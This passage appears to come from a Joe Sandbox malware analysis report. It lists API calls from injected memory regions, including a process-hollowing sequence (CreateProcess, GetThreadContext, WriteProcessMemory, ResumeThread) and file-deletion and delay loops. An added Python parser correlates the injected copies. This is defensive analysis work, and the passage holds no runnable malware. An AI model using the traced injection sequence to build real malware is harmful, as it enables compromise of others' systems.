                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02242C68
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 0b46adcf9dd6eef3742890153e45ac67fbb56de4fc34788b87d218e44658c78d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: A5311271510668DEDB2A6FB18D48FAB76BCEF40709F4046A5BE85EA058DF349580CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0224320E
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0224324C
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022431D9,00000011,?,00000000,00000000), ref: 02243279
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022431D9,00000011,?,00000000,00000000,00000000,02243092,00000004,00000000), ref: 02243285
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,022431D9,00000011,?,00000000,00000000,00000000,02243092,00000004,00000000), ref: 02243291
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: dba31129b1e20a9a0824a8bad7ff0fe67c21494d06b0bfffd090dd9dd11d6304
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 231112724106189FDF16ABA0CC48AAEB7BDEF40305F414595A985EA009DE705A80CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%
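The function entries above repeat the same code twice, once per injected memory region of process 0xC (dump bases 001C0000 and 02240000): the Opcode ID is identical for both copies of the DeleteFileA/Sleep routine while the Instruction ID differs, so Opcode ID is the field to correlate on. The control-flow graph for that routine loops from its Sleep block back to the block ahead of the DeleteFileA calls, and the Sleep argument 000A012C decodes to 655660 ms, roughly eleven minutes between retries. The following parser is an added example and is not part of the Joe Sandbox report or its tooling; it reads the plain-text rendering of the "APIs" blocks as shown on this page (the function names, and the assumption that this text layout is stable, are mine), groups functions by Opcode ID across dump regions, and decodes the Sleep durations and the OpenProcess access mask (001F0FFF is PROCESS_ALL_ACCESS as defined for pre-Vista targets). The embedded excerpt is copied from the report blocks above with the fields the parser does not read removed.

```python
"""Parse Joe Sandbox 'APIs' function blocks and correlate them across dumps.

Added example, not part of the report. Function names are hypothetical and the
input format assumed is this page's plain-text rendering, not Joe Sandbox HTML.
"""
import re
from collections import defaultdict

# Excerpt copied from the function blocks above: the DeleteFile/Sleep routine as
# it appears in both injected regions of process 0xC, plus the
# FindWindow/OpenProcess/ExitProcess routine. Other report fields were dropped.
REPORT_EXCERPT = """\
APIs
• lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
  • Part of subcall function 02242B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02242C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
Memory Dump Source
• Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 0b46adcf9dd6eef3742890153e45ac67fbb56de4fc34788b87d218e44658c78d
APIs
• lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
APIs
• FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
Memory Dump Source
• Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
• Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
• Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
"""

# One "API.MODULE(args), ref: addr" line, optionally prefixed by "Part of subcall function X:".
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$")
# Dump file names start with the PID in hex (0000000C = process 12); the Offset is the dump base.
SOURCE_RE = re.compile(r"Source File: (?P<pid>[0-9A-Fa-f]{8})\.\S+, Offset: (?P<off>[0-9A-Fa-f]+)")
ID_RE = re.compile(r"(?P<kind>Opcode|Instruction) ID: (?P<id>[0-9a-f]{64})")

# PROCESS_ALL_ACCESS for targets older than Vista; Vista+ builds use 0x1FFFFF.
PROCESS_ALL_ACCESS_LEGACY = 0x1F0FFF


def parse_blocks(text):
    """Return one dict per 'APIs' block: calls, PID, dump region, opcode/instruction IDs."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "pid": None, "region": None, "opcode_id": None, "instruction_id": None}
            blocks.append(cur)
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"api": m["api"], "module": m["mod"], "args": args,
                                 "ref": int(m["ref"], 16), "subcall": m["sub"]})
        elif m := SOURCE_RE.search(line):
            cur["pid"], cur["region"] = int(m["pid"], 16), int(m["off"], 16)
        elif m := ID_RE.search(line):
            cur[m["kind"].lower() + "_id"] = m["id"]
    return blocks


def direct_api_sequence(block):
    """APIs the function calls itself, skipping the 'Part of subcall' lines."""
    return [c["api"] for c in block["calls"] if c["subcall"] is None]


def sleep_durations_ms(block):
    """First argument of each direct Sleep call, decoded from hex to milliseconds."""
    return [int(c["args"][0], 16) for c in block["calls"] if c["api"] == "Sleep" and c["subcall"] is None]


def open_process_masks(block):
    """(dwDesiredAccess, is PROCESS_ALL_ACCESS) for each OpenProcess call."""
    return [(int(c["args"][0], 16), int(c["args"][0], 16) == PROCESS_ALL_ACCESS_LEGACY)
            for c in block["calls"] if c["api"] == "OpenProcess"]


def group_by_opcode(blocks):
    """Opcode ID -> sorted dump bases containing that function (same code, different addresses)."""
    regions = defaultdict(set)
    for b in blocks:
        regions[b["opcode_id"]].add(b["region"])
    return {k: sorted(v) for k, v in regions.items()}


if __name__ == "__main__":
    parsed = parse_blocks(REPORT_EXCERPT)
    for opcode, bases in group_by_opcode(parsed).items():
        print(opcode[:16], "present at", [hex(r) for r in bases])
    for b in parsed:
        print(hex(b["region"]), direct_api_sequence(b), "sleep_ms:", sleep_durations_ms(b),
              "OpenProcess:", [(hex(m), ok) for m, ok in open_process_masks(b)])
```

Running it on a full report dump rather than the excerpt turns the function list into a table of which routines were injected where, which is the quickest way to confirm that the code at 02240000 is a relocated copy of the 001C0000 payload rather than a second stage.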

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02243F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02243F51
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02243F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02243F6F
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02243F7F
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02243F8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction ID: 54428cb05abc3182e8d436c58939e8dd3b2f2a4c1ed812aba08b0d4b2c60d910
                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction Fuzzy Hash: E3F01CB05683509AFB48BFF08C4CA4E3AB9AF00704F1501D0AA89AD09EDF7490508E75
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.2966196276.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_ab0000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000012.00000002.2966205719.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_18_2_290000_smartscreen.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000012.00000002.2966205719.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_18_2_290000_smartscreen.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0241098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 024109A5
                                                                                                                                                                            • Part of subcall function 0241098B: GetStartupInfoA.KERNEL32(00000000), ref: 024109BD
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0241001D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction ID: 50d6ee2316b118c1bf614193e8e38a8508b19c0441586af3adfa51ce95c114a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C72127144E3C44FD7279B208A65A667F79BF03208B0D30CBDC81DE1B3D6689989C76A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1971670206.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_750000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction ID: 2a80003d27717977124701b8026b26c6787b26f5450d949885d04d1fcbbdf16c
                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction Fuzzy Hash: A73277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                            • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                            • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                            • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                            • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                            • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                            • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                            • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                            • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
